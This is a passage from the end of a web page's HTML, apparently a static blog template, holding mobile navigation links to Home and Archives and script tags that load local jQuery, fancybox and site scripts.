    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.4.1.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>